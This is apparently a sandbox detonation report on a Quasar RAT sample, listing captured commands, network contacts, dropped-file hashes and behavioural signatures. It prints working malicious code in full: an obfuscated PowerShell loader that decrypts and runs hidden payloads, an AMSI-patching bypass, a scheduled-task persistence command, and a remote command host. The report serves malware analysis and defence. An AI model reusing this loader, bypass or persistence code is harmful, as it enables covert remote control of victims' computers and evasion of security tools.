"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('F+5wamWtVzd3aK2bnS7nWh4XV0PZc2pVZ9YG0yRK5cI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lnHVCKXb70Ny+fnCAwMhpw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $fLkgt=New-Object System.IO.MemoryStream(,$param_var); $wtCVF=New-Object System.IO.MemoryStream; $XRlUB=New-Object System.IO.Compression.GZipStream($fLkgt, [IO.Compression.CompressionMode]::Decompress); $XRlUB.CopyTo($wtCVF); $XRlUB.Dispose(); $fLkgt.Dispose(); $wtCVF.Dispose(); $wtCVF.ToArray();}function execute_function($param_var,$param2_var){ $PEWwL=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $iVLBa=$PEWwL.EntryPoint; $iVLBa.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_817.bat';$OJTBF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_817.bat').Split([Environment]::NewLine);foreach ($Wvrxg in $OJTBF) { if ($Wvrxg.StartsWith(':: ')) { $TvDjF=$Wvrxg.Substring(3); break; }}$payloads_var=[string[]]$TvDjF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
C:\Users\Admin\AppData\Local\Temp\New.exe
"C:\Users\Admin\AppData\Local\Temp\New.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:GltjFXMlvWca{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$oQWvtwOPduIOuT,[Parameter(Position=1)][Type]$aKAsteImeH)$NyuJkJekwgb=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+'l'+''+[Char](101)+''+[Char](99)+'t'+[Char](101)+''+[Char](100)+''+[Char](68)+''+'e'+'le'+[Char](103)+'at'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+''+[Char](77)+''+[Char](101)+'m'+[Char](111)+''+[Char](114)+''+[Char](121)+''+[Char](77)+''+'o'+''+'d'+''+[Char](117)+''+'l'+'e',$False).DefineType(''+[Char](77)+''+[Char](121)+'D'+'e'+''+[Char](108)+'e'+[Char](103)+''+'a'+''+[Char](116)+'e'+[Char](84)+''+'y'+''+[Char](112)+''+[Char](101)+'','Cl'+'a'+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+'i'+'c'+[Char](44)+''+'S'+''+[Char](101)+''+'a'+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+','+'An'+[Char](115)+'iC'+[Char](108)+''+[Char](97)+''+[Char](115)+'s'+[Char](44)+'A'+[Char](117)+''+[Char](116)+'oCl'+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$NyuJkJekwgb.DefineConstructor('R'+[Char](84)+'S'+[Char](112)+''+[Char](101)+'ci'+[Char](97)+''+[Char](108)+''+'N'+'a'+[Char](109)+''+'e'+',H'+'i'+''+'d'+''+'e'+''+'B'+''+'y'+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+'u'+''+[Char](98)+'l'+'i'+''+'c'+'',[Reflection.CallingConventions]::Standard,$oQWvtwOPduIOuT).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+[Char](116)+'i'+[Char](109)+''+[Char](101)+''+[Char](44)+''+'M'+''+'a'+''+'n'+''+[Char](97)+'g'+'e'+''+[Char](100)+'');$NyuJkJekwgb.DefineMethod(''+[Char](73)+''+[Char](110)+''+'v'+''+[Char](111)+''+'k'+''+'e'+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+'i'+[Char](100)+''+'e'+''+'B'+'y'+[Char](83)+''+[Char](105)+''+'g'+''+[Char](44)+''+[Char](78)+''+[Char](101)+'w'+[Char](83)+''+'l'+''+[Char](111)+''+[Char](116)+','+[Char](86)+''+[Char](105)+'r'+[Char](116)+''+'u'+''+[Char](97)+''+[Char](108)+'',$aKAsteImeH,$oQWvtwOPduIOuT).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+'me'+[Char](44)+'Ma'+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+'d');Write-Output $NyuJkJekwgb.CreateType();}$LfhTNAavYhWOb=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+'m'+''+[Char](46)+'d'+'l'+''+'l'+'')}).GetType(''+'M'+''+'i'+''+[Char](99)+''+[Char](114)+''+[Char](111)+'so'+'f'+'t'+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+'3'+''+[Char](50)+''+[Char](46)+''+[Char](85)+'nsa'+'f'+''+[Char](101)+''+'N'+''+[Char](97)+''+[Char](116)+'i'+[Char](118)+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+'t'+''+[Char](104)+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$tkVTlkSrYoAqOX=$LfhTNAavYhWOb.GetMethod('G'+[Char](101)+''+[Char](116)+''+'P'+''+[Char](114)+''+'o'+''+[Char](99)+''+[Char](65)+'d'+'d'+''+[Char](114)+''+'e'+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+'ic'+[Char](44)+''+'S'+''+'t'+''+[Char](97)+'t'+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$SaSEcIxCuVAlKzbddjk=GltjFXMlvWca @([String])([IntPtr]);$HmdVDdXquEAWmDMjvpbgoO=GltjFXMlvWca @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$QHlCTCWFNUf=$LfhTNAavYhWOb.GetMethod(''+[Char](71)+''+[Char](101)+'tM'+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+'e'+'Ha'+[Char](110)+''+'d'+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+'e'+[Char](114)+''+[Char](110)+''+'e'+''+'l'+''+[Char](51)+''+'2'+''+[Char](46)+'d'+[Char](108)+''+[Char](108)+'')));$XKyNmjxQMiAFWU=$tkVTlkSrYoAqOX.Invoke($Null,@([Object]$QHlCTCWFNUf,[Object]('L'+[Char](111)+''+[Char](97)+''+[Char](100)+'L'+[Char](105)+''+'b'+'r'+[Char](97)+'r'+'y'+''+'A'+'')));$bWzSjKjhbzFNVvjjH=$tkVTlkSrYoAqOX.Invoke($Null,@([Object]$QHlCTCWFNUf,[Object](''+'V'+'i'+[Char](114)+'t'+'u'+''+'a'+''+[Char](108)+''+[Char](80)+''+[Char](114)+''+[Char](111)+'t'+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$fMTzYjj=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XKyNmjxQMiAFWU,$SaSEcIxCuVAlKzbddjk).Invoke('a'+'m'+''+'s'+'i'+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');$FHYpRawSnVPHrnDIR=$tkVTlkSrYoAqOX.Invoke($Null,@([Object]$fMTzYjj,[Object](''+'A'+''+'m'+'s'+[Char](105)+'S'+'c'+'a'+[Char](110)+''+'B'+''+[Char](117)+''+[Char](102)+''+[Char](102)+'er')));$sKIdMnejxT=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($bWzSjKjhbzFNVvjjH,$HmdVDdXquEAWmDMjvpbgoO).Invoke($FHYpRawSnVPHrnDIR,[uint32]8,4,[ref]$sKIdMnejxT);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$FHYpRawSnVPHrnDIR,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($bWzSjKjhbzFNVvjjH,$HmdVDdXquEAWmDMjvpbgoO).Invoke($FHYpRawSnVPHrnDIR,[uint32]8,0x20,[ref]$sKIdMnejxT);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+'T'+[Char](87)+'A'+'R'+'E').GetValue(''+'$'+'77'+'s'+''+[Char](116)+''+[Char](97)+''+[Char](103)+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\SysWOW64\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77New.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\New.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{05d7a111-fc70-4e5f-bc1d-5268db5a4670}
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SybViDMmHlQl.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\SysWOW64\PING.EXE
ping -n 10 localhost
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | runderscore00-25501.portmap.host | udp |
| DE | 193.161.193.99:25501 | runderscore00-25501.portmap.host | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.193.161.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.117.168.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
Files
memory/4628-2-0x0000000073B0E000-0x0000000073B0F000-memory.dmp
memory/4628-3-0x00000000052C0000-0x00000000052F6000-memory.dmp
memory/4628-5-0x0000000007AD0000-0x00000000080F8000-memory.dmp
memory/4628-4-0x0000000073B00000-0x00000000741EE000-memory.dmp
memory/4628-6-0x0000000073B00000-0x00000000741EE000-memory.dmp
memory/4628-7-0x00000000079F0000-0x0000000007A12000-memory.dmp
memory/4628-8-0x0000000008100000-0x0000000008166000-memory.dmp
memory/4628-9-0x0000000008350000-0x00000000083B6000-memory.dmp
memory/4628-10-0x00000000083C0000-0x0000000008710000-memory.dmp
memory/4628-13-0x00000000082C0000-0x00000000082DC000-memory.dmp
memory/4628-14-0x0000000008B80000-0x0000000008BCB000-memory.dmp
memory/4628-15-0x0000000008A30000-0x0000000008AA6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mtgd3xbi.pt3.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4628-26-0x0000000073B00000-0x00000000741EE000-memory.dmp
memory/4628-31-0x000000000B2B0000-0x000000000B928000-memory.dmp
memory/4628-32-0x0000000009A40000-0x0000000009A5A000-memory.dmp
memory/4628-33-0x00000000099F0000-0x00000000099F8000-memory.dmp
memory/4628-34-0x0000000009B20000-0x0000000009C12000-memory.dmp
memory/4628-35-0x000000000D930000-0x000000000DE2E000-memory.dmp
memory/4884-45-0x0000000073B00000-0x00000000741EE000-memory.dmp
memory/4884-46-0x0000000073B00000-0x00000000741EE000-memory.dmp
memory/4884-47-0x0000000073B00000-0x00000000741EE000-memory.dmp
memory/4884-64-0x00000000093A0000-0x00000000093D3000-memory.dmp
memory/4884-66-0x00000000706E0000-0x000000007072B000-memory.dmp
memory/4884-67-0x0000000009380000-0x000000000939E000-memory.dmp
memory/4884-65-0x0000000073B00000-0x00000000741EE000-memory.dmp
memory/4884-72-0x0000000009520000-0x00000000095C5000-memory.dmp
memory/4884-73-0x0000000073B00000-0x00000000741EE000-memory.dmp
memory/4884-74-0x0000000009710000-0x00000000097A4000-memory.dmp
memory/4884-159-0x0000000073B00000-0x00000000741EE000-memory.dmp
memory/4884-166-0x0000000073B00000-0x00000000741EE000-memory.dmp
C:\Users\Admin\AppData\Roaming\startup_str_817.vbs
| MD5 | af3b7323ae40be47582f3d8ccab8120c |
| SHA1 | c1ee2a6f5e92f32df41da9e44fe48ecab9f967fd |
| SHA256 | e2b510081177244136bbdd64ca178db9be492354945121cd2d09dc8729423340 |
| SHA512 | 4dbc9ba62e28e8615b3302d37a954eeb493b444fa582b4c8dc22426b680c2d2debe8c785e6df630694c549d81d28aa3b08eb8e6cb68df8d17d379879d634aa54 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | ac3d19fbb5c5f10833f1882308f77548 |
| SHA1 | ac880466fd99a5719fedc7289b00d78ba7088e06 |
| SHA256 | 3353b90af649198e084632af776f8c6ea3a9302da5a50d85f7ecde1c7ad295df |
| SHA512 | b5e6369d7f475e9931d19fb2a5305b4c901ca5fcac5d788d064b6a1b1d6de2034e84932ac243d5056c745b924a2e9537a06b4172fab364402263788c814bc28b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 465ec9d670c5e7cc2338a821a9cbaefe |
| SHA1 | 9ce43163c45051a781fed07a659f849ab21b7835 |
| SHA256 | 6b7d75bf8fc573cc3e2ebb16b6dc634821e93c172157a890daa71c24838632b2 |
| SHA512 | 1062dedbf1fc15bf717149ad56b7d7d8ab7391f4da350314a1c7221cee391f8358b3a5a3fb109349ee9cde69fd4d0a0a6a3ad25df1b8ba380c9b9dd16ceb7e2c |
C:\Users\Admin\AppData\Roaming\startup_str_817.bat
| MD5 | f6d5bfaee8a55ff72c7b453fda066d62 |
| SHA1 | 7d737d53013990e5d05076b7206e43eb4793fc7f |
| SHA256 | 3ff8b6a041a96625d730dfe770eb6e84be8ce99fc50a0027724e48394f053308 |
| SHA512 | e300c15bef9e898e7abd4ecf6759c0e60829e8d9b507e257359b0c0342c56d56adf7924c76ffbbee4c42e1b1ea229b7032d177849d2668720090780190b7f284 |
memory/4616-205-0x000000000AD80000-0x000000000AE12000-memory.dmp
memory/4616-204-0x000000000AC60000-0x000000000ACCC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\New.exe
| MD5 | cf570b21f42f0ce411b7c9961068931e |
| SHA1 | f92aa688a1dbd64a4585ecfe80a9c2d7f408c57d |
| SHA256 | d0c4045c70a0822806a4e56d7883821cd2c19362f1cfed3bcbdb1e1b8eb15234 |
| SHA512 | de9dce8300656cd8531569011d043373193cbda125b738e66a5bf107178b48781d6dc88eea696b2074c352a1bf56a4693cfae62e668993ac24ce18aebfdcd684 |
memory/4264-222-0x0000000000520000-0x000000000058C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Install.exe
| MD5 | b51552b77057c2405f73bbbf9c89234a |
| SHA1 | 4793adbba023f90d2d2ad0ec55199c56de815224 |
| SHA256 | 720e6962d75e37e8b47b160c5b3f60433a341f00abf60041630116b26858fbb0 |
| SHA512 | 564f4104e6e398eeef8acc7ce7cab694b6eebbe4233b7cb359829242b949dc7c5bf124a550a4d0402eb7da19b8bec6c1f6753563b17a8ae36fb639be595b8d66 |
memory/4628-224-0x0000000073B00000-0x00000000741EE000-memory.dmp
memory/4616-225-0x00000000072D0000-0x00000000072E2000-memory.dmp
memory/4072-230-0x000001DB29730000-0x000001DB29752000-memory.dmp
memory/4072-233-0x000001DB41D80000-0x000001DB41DF6000-memory.dmp
memory/4616-234-0x0000000009820000-0x000000000985E000-memory.dmp
memory/4616-242-0x00000000098D0000-0x00000000098DA000-memory.dmp
memory/4072-261-0x000001DB41E00000-0x000001DB41E2A000-memory.dmp
memory/4072-263-0x00007FF998490000-0x00007FF99853E000-memory.dmp
memory/4072-262-0x00007FF99AF30000-0x00007FF99B10B000-memory.dmp
memory/1056-264-0x0000000140000000-0x0000000140008000-memory.dmp
memory/1056-267-0x0000000140000000-0x0000000140008000-memory.dmp
memory/1056-266-0x0000000140000000-0x0000000140008000-memory.dmp
memory/1056-265-0x0000000140000000-0x0000000140008000-memory.dmp
memory/1056-272-0x0000000140000000-0x0000000140008000-memory.dmp
memory/1056-274-0x00007FF998490000-0x00007FF99853E000-memory.dmp
memory/1056-273-0x00007FF99AF30000-0x00007FF99B10B000-memory.dmp
memory/1056-275-0x0000000140000000-0x0000000140008000-memory.dmp
memory/580-279-0x0000028AD36D0000-0x0000028AD36FA000-memory.dmp
memory/580-278-0x0000028AD36A0000-0x0000028AD36C5000-memory.dmp
memory/580-280-0x0000028AD36D0000-0x0000028AD36FA000-memory.dmp
memory/636-295-0x000002287EDD0000-0x000002287EDFA000-memory.dmp
memory/744-305-0x000001C711750000-0x000001C71177A000-memory.dmp
memory/744-306-0x00007FF95AFC0000-0x00007FF95AFD0000-memory.dmp
memory/744-300-0x000001C711750000-0x000001C71177A000-memory.dmp
memory/908-316-0x00007FF95AFC0000-0x00007FF95AFD0000-memory.dmp
memory/908-310-0x000001AFE3C10000-0x000001AFE3C3A000-memory.dmp
memory/908-315-0x000001AFE3C10000-0x000001AFE3C3A000-memory.dmp
memory/636-290-0x000002287EDD0000-0x000002287EDFA000-memory.dmp
memory/636-296-0x00007FF95AFC0000-0x00007FF95AFD0000-memory.dmp
memory/580-285-0x0000028AD36D0000-0x0000028AD36FA000-memory.dmp
memory/580-286-0x00007FF95AFC0000-0x00007FF95AFD0000-memory.dmp
memory/1008-325-0x00000272CA420000-0x00000272CA44A000-memory.dmp
memory/1008-326-0x00007FF95AFC0000-0x00007FF95AFD0000-memory.dmp
memory/1008-320-0x00000272CA420000-0x00000272CA44A000-memory.dmp
C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04
| MD5 | 48834f416d76621ea289ca1263d613ec |
| SHA1 | 8badffc9d8ee257ec4b8f8d506f690fb86ce781e |
| SHA256 | 9dfdc67a40014892d0af20b130ade05058418d3d4295f628d39cb898b8dedf58 |
| SHA512 | 63b7bf38b7572f975bbb18c8ccb32aea344fd404d9037884ab60359dc87662bf175958b5851c2d50f32d3e2d436a887d71ccc8516b9c4f337577ef4dc88a26e4 |
C:\Users\Admin\AppData\Local\Temp\SybViDMmHlQl.bat
| MD5 | c015fdc361eeeb71cb0244e420b2ef89 |
| SHA1 | 22d97ffc632bcd2b4481383d040eaba38d111f13 |
| SHA256 | bd7e8174609f6ca1a59d3ffe0194af72103762fa58fdc87f16dd6c1a9844c7f8 |
| SHA512 | a26bea5ae843d9e302f972aa34a2f6e05e03f1e479c999475ce7784942a735b1fc74dc3eb2c5a1123439168a176d7dfad05c57f5c09147f9ae30bc4ebcd48fea |
C:\Users\Admin\AppData\Roaming\$sxr-Logs\05-28-~1
| MD5 | 668c9d9256a82a28f5769c6010a48665 |
| SHA1 | 514feb1105a5c6e4e0c877bab7ae7283877ca9e6 |
| SHA256 | f797408c1bbf907851fa5501093fbee68506eace9ef2439e9dba5ac61a262daa |
| SHA512 | b22c4662ee5e89a7509af58b4ebcab4d4df8bae8fbc37dd17da42ed970adbcdc2abb5b24dabfa888680a164d69a3dda1c3bf2bfa42dc39f973e8828a27f6a5af |
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-28 13:52
Reported
2024-05-28 13:58
Platform
win10v2004-20240426-en
Max time kernel
300s
Max time network
225s
Command Line
Signatures
Quasar RAT
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 3504 created 604 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Sets service image path in registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DoSvc\ImagePath = "C:\\Windows\\System32\\svchost.exe -k NetworkService -p" | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\New.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Install.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3504 set thread context of 2320 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\System32\mousocoreworker.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\SCHTASKS.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
